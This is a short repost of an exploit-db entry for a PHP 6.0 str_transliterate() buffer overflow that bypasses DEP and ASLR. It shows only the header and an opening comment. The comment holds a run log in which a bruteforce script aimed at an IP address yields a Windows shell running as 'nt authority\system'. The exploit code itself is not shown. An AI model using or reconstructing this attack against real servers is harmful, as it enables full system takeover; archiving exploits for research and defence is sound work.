PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
来源:exploit-db.com
# Title: PHP 6.0 Dev str_transliterate() Buffer overflow – NX + ASLR Bypass
# EDB-ID: 12189
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Matteo Memelli
# Published: 2010-04-13
# Verified: yes
# Download Exploit Code
# Download Vulnerable app
view source
print?
<?php
/*
04-06-2010 PHP 6.0 Dev str_transliterate() 0Day Buffer Overflow Exploit
Tested on Windows 2008 SP1 DEP alwayson
Matteo Memelli aka ryujin ( AT ) offsec.com
original sploit: http://www.exploit-db.com/exploits/12051 (Author: Pr0T3cT10n)
Thx to muts and Elwood for helping ;)
Bruteforce script is attached in base64 format.
root@bt:~# ./brute_php6.py 172.16.30.249 /pwnPhp6.php win2k8
(*) Php6 str_transliterate() bof || ryujin # offsec.com
(*) Bruteforcing WPM ret address…
(+) Trying base address 0×78000000
(+) Trying base address 0×77000000
(+) Trying base address 0×76000000
(+) Trying base address 0×75000000
Microsoft Windows [Version 6.0.6001]
Copyright (c) 2006 Microsoft Corporation. All rights reserved.
C:\wamp\bin\apache\Apache2.2.11>whoami
whoami
nt authority\system
*/
阅读全文…